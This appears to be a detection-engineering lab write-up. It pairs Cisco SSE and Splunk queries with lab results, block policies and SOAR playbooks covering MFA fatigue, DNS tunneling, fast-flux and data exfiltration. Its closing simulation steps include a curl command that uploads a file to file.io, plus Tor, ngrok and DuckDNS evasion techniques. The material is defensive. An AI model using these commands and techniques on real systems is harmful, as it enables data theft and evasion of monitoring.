Engineering detections with Cisco SSE and Splunk Enterprise Security

Validation Query

index=sse (sourcetype="cisco:cloud_security:dns" OR sourcetype="cisco:cloud_security:proxy") proxysite
| eval domain=coalesce(domain, replace(url,"^https?://([^/]+).*$","\1"))
| eval user=coalesce(user, identities)
| search category="*anonymizer*"
| stats earliest(_time) AS first_seen latest(_time) AS last_seen
 values(sourcetype) AS telemetry values(domain) AS domains values(category) AS category BY user src_ip
| eval risk_score=85, risk_object=user, risk_object_type="user"
| eval risk_message="User accessed proxy-evasion or anonymizer infrastructure 

Lab Result — mahamudul 

user: mahamudul src_ip: 10.0.1.115
domain: www.proxysite.com
category: Proxy/Anonymizer, Application, Filter Avoidance
telemetry: cisco:cloud_security:dns + cisco:cloud_security:proxy
risk_score: 85 

mahamudul resolved and connected to www.proxysite.com — categorized Proxy/Anonymizer and Filter Avoidance. This creates an encrypted tunnel that hides all subsequent traffic from SWG and DLP inspection. This is the evasion precursor. On its own, it's a policy violation. Combined with subsequent signals on the same entity, it's an attacker covering their tracks before credential theft 

SSE Policy — Web Policy — Proxy Evasion 

BLOCK        Anonymizer and Proxy Avoidance categories: deny at the enforcement layer before the Splunk platform sees it
BLOCK        Tor Entry/Exit node category: zero legitimate enterprise use case
MONITOR   VPN browser extensions: flag for investigation, don't block until confirmed malicious 

Validation query

index=sse sourcetype="cisco:cloud_security:dns"
| where (dns_category="Uncategorized" OR match(dns_category,"(?i)Newly|Phishing|Suspicious"))
| stats earliest(_time) AS dns_time values(dns_category) AS dns_category BY user domain
| join type=inner user domain [search
 search index=sse sourcetype="cisco:cloud_security:proxy"
 | where upper(http_method)="POST" AND upper(action)="ALLOWED"
 | stats earliest(_time) as post_time values(url) AS url BY user domain ]
| eval delta=round(post_time - dns_time, 0)
| where delta >= 0 AND delta <= 1800
| eval risk_score=95, risk_object=user, risk_object_type="user" 

Lab Result — kemfakta.se / hutdalarna.se 

user:       mahamudul
domain: kemfakta.se delta: 0s is_nrd: YES status: 200
domain: hutdalarna.se delta: 1s is_nrd: YES status: 200
dns_category: Uncategorized risk_score: 95 

Two newly registered domains. Zero-to-one second delta between DNS resolution and HTTP POST. That speed rules out manual browsing; this is an automated phishing kit or a pre-staged redirect. The SOC now has near-certain evidence of credential submission. Next step: check whether harvested credentials appeared on a VPN login within the following minutes. They did. See CiscoSSE-06 below 

SSE Policy — Web Policy — DNS / Phishing 

BLOCK Newly Registered Domain category: block direct access, require security review for exceptions
BLOCK Phishing and Social Engineering categories
INSPECT Uncategorized domains: require HTTPS inspection before allowing; log all POST requests
MONITOR All HTTP POST requests to domains with < 30-day registration age. 

Validation query
CiscoSSE-05 —Duo MFA fatigue

index=* sourcetype="cisco:duo:authentication*"
| eval user=mvindex(split(coalesce(user,email),"@"),0)
| bucket _time span=10m
| stats count AS pushes sum(eval(result="denied")) AS denied BY user _time
| where pushes >= 6 AND denied >= 5
| eval risk_score=80, risk_object=user 

CiscoSSE-05  Lab Result — mahamudul 

user: mahamudul pushes: 18 denied: 8 window: 10 minutes
risk_score: 80 

18 pushes. 8 explicit denials. 10 minutes. The password is already compromised; you don't push-bomb without it. SOC should intervene before the next approval. They didn't get the chance in the lab because CiscoSSE-06 fired one second later. 

Validation query  
CiscoSSE-06 — Confirmed ATO: join Duo fatigue + VPN session 

index=* sourcetype="cisco:duo:authentication*"
| stats count AS pushes sum(eval(result="denied")) AS denied sum(eval(result="success")) AS allowed BY user _time
| where pushes>=6 AND denied>=5
| join user [search
 search index=sse sourcetype="cisco:cloud_security:ravpn"
 | eval user=mvindex(split(user,"@"),0)
 | stats values(public_ip) AS vpn_ip values(profile) AS vpn_profile BY user]
| eval risk_score=100, risk_object=user 

CiscoSSE-06 Lab Result — Confirmed ATO 

user: mahamudul pushes: 18 denied: 8 allowed: 1
vpn_ip: [3 distinct IPs] vpn_profile: Anwar_VPN_Profile
risk_score: 100 

One approval. The attacker push-bombed 18 times, got 1 approval, and immediately established a VPN session from 3 different IPs under Anwar_VPN_Profile. Risk score 100. Confirmed Account Takeover with active VPN access. SOAR triggered: VPN session terminated, password reset forced, Duo device locked. All this happened before the analyst opened the ticket. 

SOAR Playbook Recommendation  
Triggered by: CiscoSSE — MFA Fatigue Leading to Confirmed VPN Account Takeover 

1. IP Reputation & Geolocation [Cisco Talos / Umbrella Investigate]. Confirm whether VPN source IPs belong to malicious infrastructure: proxy networks, TOR relays, or attacker hosting providers. 
2. VPN Session Investigation [Splunk ES]. Pull user's full VPN history: source IPs, profiles, geographies, timestamps. Confirm the Anwar_VPN_Profile login is anomalous. 
3. Terminate Active VPN Session [Cisco Secure Access VPN]. Immediately revoke the active session to stop lateral movement or data access. 
4. Force Password Reset [Active Directory / Entra ID]. Reset the compromised credential before the attacker can reuse it across other services. 
5. Lock Duo MFA Device [Cisco Duo]. Prevent the attacker from receiving additional MFA pushes while the investigation proceeds. 
6. Block Source IPs [Cisco Secure Access / Firewall]. Add attacker IPs to deny list to prevent reconnection attempts. 
7. Create P1 Incident [ServiceNow / SOAR]. Open formal incident with full context: push counts, IPs, session details, timeline. 

Validation query

index=sse sourcetype="cisco:cloud_security:dns"
| eval sub_len=len(mvindex(split(query,"."),0))
| where sub_len > 15
| bucket _time span=10m
| stats count AS vol dc(query) AS uniq_q values(query) AS query BY src_ip
| where vol > 50 OR uniq_q > 30
| eval risk_score=75, risk_object=src_ip, mitre_technique="T1071.004" 

Lab Result — 10.0.1.115 

src_ip: 10.0.1.115
vol: 132 uniq_q: 58 (within 10-minute window)
subdomain length: >15 chars each query risk_score: 75 

132 DNS requests, 58 unique subdomains longer than 15 characters, 10 minutes, which is mathematically impossible for a human user. This is an automated C2 bot cycling through encoded addresses. The key here: this is completely invisible at the firewall layer. Cisco SSE DNS telemetry is the only data source that catches it. The SOAR response blocks the domain globally across the tenant within seconds of the notable firing. 

SSE Policy — DNS Security Policy 

BLOCK        Malware, Command and Control, and Botnet categories — block at DNS resolution, no exceptions
BLOCK        Cryptomining category
MONITOR   Dynamic DNS providers: high-volume queries to DuckDNS, No-IP flagged for investigation
INSPECT     Domains with high subdomain entropy: complement Splunk detection with Cisco AI/ML domain scoring

Live Attack Simulation — CiscoSSE-08: Fast Flux C2 via DuckDNS  

Target:    my-flux-lab.duckdns.org (DuckDNS token configured for IP rotation)
Technique:     PowerShell script rotates backend IP every 70 seconds (clears upstream Umbrella cache TTL)
Resolution:     Windows native [System.Net.Dns]::GetHostAddresses() forces SSE agent interception
Result:             9 queries within 1-hour window, each resolving to a different IP
Splunk Detection: vol=9, threshold=5 — alert fired, entity scored, SOAR playbook triggered 

Note: Wait 5 minutes after simulation for Umbrella to flush S3 logs before checking the Splunk platform. 

Validation query

index=sse sourcetype="cisco:cloud_security:proxy" action="ALLOWED"
| eval actor=coalesce(user, src_ip)
| eval dest_domain=lower(coalesce(url_domain, server_name))
| where match(dest_domain,"(?i)(file\.io|dropbox\.com|mega\.nz|wetransfer\.com|gofile\.io)")
 OR match(category,"(?i)file transfer|cloud storage|file sharing")
| stats sum(bytes) AS total_bytes count AS session_count min(_time) AS firstTime BY actor src_ip dest_domain
| eval correlation_score=if(session_count>=3,1,0)+if(total_bytes>=20000,1,0)+if(match(dest_domain,"(?i)mega\.nz|file\.io|gofile\.io"),1,0)
| where correlation_score >= 2
| eval risk_score=case(correlation_score>=3,80, correlation_score=2,70, true(),60) 

Lab Result — mahamudul → file.io 

actor: mahamudul src_ip: 10.0.1.115
dest_domain: file.io session_count: 22 category: File Transfer / Cloud Storage
correlation_score: 3 severity: high risk_score: 80 mitre_technique: T1567.002 

22 proxy sessions to file.io over 45 minutes. All three correlation signals fired. In the lab environment the volume is small, and that's expected in simulation. In production, 22 sessions to a temporary file-sharing service with no corporate governance is data staging. Combined with the anonymizer access and DLP events on the same entity, this is the exfiltration confirmation that the analyst needs to close the case. 

SSE Policy — CASB Policy — Cloud Storage 

BLOCK            Unsanctioned apps by default: allowlist only corporate-approved cloud storage
BLOCK            file.io, mega.nz, gofile.io, WeTransfer, MediaFire: personal/anonymous hosting
MONITOR       Approved cloud storage (Dropbox Business, OneDrive): log all uploads above 50MB
INSPECT         All HTTPS traffic to cloud storage categories: required for DLP to operate inline 

Validation query

GenAI exfil detection — DLP + CASB + proxy correlation 

index=sse
(sourcetype="cisco:cloud_security:proxy" OR sourcetype="cisco:cloud_security:dns")
| eval actor=coalesce(user, src, src_ip)
| eval src_ip=coalesce(src_ip, src)
| eval dest_domain=lower(coalesce(url_domain, server_name, domain, query))
| eval dest_domain=replace(dest_domain, "\.\$", "")
| where match(dest_domain,"(?i)(api\.openai\.com|chatgpt\.com|openai\.com|claude\.ai|gemini\.google\.com|perplexity\.ai)")
| stats count AS event_count
       sum(bytes_out) AS total_bytes_out
       values(sourcetype) AS sourcetypes values(category) AS categories
       min(_time) AS firstTime max(_time) AS lastTime
       BY actor src_ip dest_domain
| eval correlation_score=
    if(event_count>=2,1,0) +
    if(total_bytes_out>=4000,1,0) +
    if(match(dest_domain,"(?i)api\.openai\.com|claude\.ai|perplexity\.ai"),1,0)
| where correlation_score >= 2
| eval risk_score=case(correlation_score>=3,90, correlation_score=2,75, true(),60)
| eval risk_object=actor, risk 

Lab Result — EC2AMAZ-J8G2CH1 (GenAI Activity Detected) 

actor: EC2AMAZ-J8G2CH1   src_ip: 10.0.1.115
ab.chatgpt.com     events: 7    bytes_out: 12,921   score: 2
api.openai.com     events: 6    bytes_out: 9,829    score: 3  (all 3 signals fired)
chatgpt.com        events: 18   bytes_out: 368,569  score: 2
gemini.google.com  events: 2    bytes_out: 231,836  score: 2 

categories: Generative AI / Application Allow / Application Block 

sourcetypes: cisco:cloud_security:dns + cisco:cloud_security:proxy 

33 total GenAI connections from EC2AMAZ-J8G2CH1. chatgpt.com alone accounted for 368KB of outbound data. api.openai.com scored 3. All three correlation signals fired: repeated sessions, meaningful outbound bytes, and a high-risk AI domain. The Cisco SSE Generative AI category confirms these are sanctioned tools, not shadow IT, which is exactly what makes this exfiltration path dangerous. Data left through a trusted, HTTPS-encrypted channel that looks completely legitimate from the perimeter. 

SSE Policy — Web Policy — GenAI / AI Tools 

MONITOR      AI Tools category: log all sessions, enable HTTPS inspection for DLP to operate
INSPECT        chatgpt.com, openai.com, copilot.microsoft.com, gemini.google.com: inline DLP inspection required
BLOCK           Unapproved AI tools by risk score (weightedRisk >= 80 in appdiscovery): limit to corporate-approved providers  
MONITOR      Large downloads from AI providers (>500KB): flag for DLP review 

SOAR Playbook — Triggered by: GenAI Sensitive Data Exfiltration 

1. DLP Event Enrichment [Cisco Secure Access DLP]. Pull the DLP classification type, file name, and matched patterns to determine whether the content involved PII, PCI, PHI, or proprietary IP. 
2. User Activity Investigation [Splunk ES]. Review the full user session: what AI providers were accessed, session duration, bytes transferred, and whether a download followed the upload. 
3. AI Provider Policy Update [Cisco Secure Access]. If the violation is confirmed, update the web policy to require step-up authentication or block access to that specific AI provider for the user. 
4. DLP Report Generation [Cisco Secure Access DLP]. Pull the full DLP audit trail for compliance reporting and regulatory notification if PII or PCI was involved. 
5. Incident Escalation [ServiceNow / Legal / Compliance]. If regulated data is confirmed, escalate to Data Protection and Legal for breach notification assessment. 

From victim Windows host: attempt VPN login for mahamudul@prod.securitylabs.ca
Enter 5 consecutive incorrect passwords → 5 AD 4625 events (stuffing_score computed)
Attempt MFA approval → Duo fires 18 pushes within 10 minutes, 8 denied
Attacker approves 1 push → VPN session established from 3 distinct public IPs
Splunk Enterprise Security: CiscoSSE-05 fires (risk 80), CiscoSSE-06 fires immediately after (risk 100)
SOAR: VPN session terminated, password reset queued, Duo device locked — 47 seconds total 

PowerShell: configure DuckDNS token, set domain my-flux-lab.duckdns.org
Loop: rotate backend IP via DuckDNS API → wait 70s (clears Umbrella TTL cache) → resolve domain
Use [System.Net.Dns]::GetHostAddresses() to force SSE agent interception on each resolution
20 iterations → 20 unique IP resolutions logged in cisco:cloud_security:dns
Splunk Enterprise Security: DNS Fast Flux detection fires at iteration 6 (threshold: 5 per hour)
SOAR: domain blocked in Cisco Umbrella, endpoint flagged for malware scan 

Authenticate to Cisco Secure Access VPN as mahamudul using Anwar_VPN_Profile
Create 1GB test file: fsutil file createnew C:\temp\1gb_test.dat 1073741824
Upload to file.io via curl: curl -F 'file=@C:\temp\1gb_test.dat' https://file.io
Cisco SSE proxy logs: VPN session → DNS resolution of file.io → HTTPS CONNECT → upload
Splunk Enterprise Security: VPN-to-DNS delta = 180s, DNS-to-proxy delta = 1s — both within thresholds
Finding fires with full chain: VPN login + DNS + proxy exfil correlated on session_ip 

PowerShell: fetch live Tor exit node list from dan.me.uk/torlist/?exit (with custom UA)
Select random Tor exit IP from list (fallback: 185.220.101.4, 192.42.116.175, etc.)
Generate 5 outbound HTTP connections to Tor exit node IP via Invoke-WebRequest
Cisco SSE proxy: connection categorized as Anonymizer, logged even on destination reject
Splunk Enterprise Security: tor_exit_nodes.csv lookup joins on dest_ip → 6 confirmed Tor connections in 1h
Detection fires: risk_score=85, SOAR isolates endpoint, adds Tor IPs to deny list 

PowerShell: Invoke-WebRequest to connect.us.ngrok-agent.com and region1.argotunnel.com
Even on 403/destination-reject, Cisco SSE proxy logs the outbound connection attempt
6 connections to ngrok relay within 1-hour window → 19,466 bytes transferred
Splunk Enterprise Security: connections=6, threshold=3 — 'Reverse Tunneling Detected' alert fires
SSE Policy complement: Block Tunneling/Proxy categories in web policy
SOAR: user context check (authorized developer?), conditional block_domain, optional isolate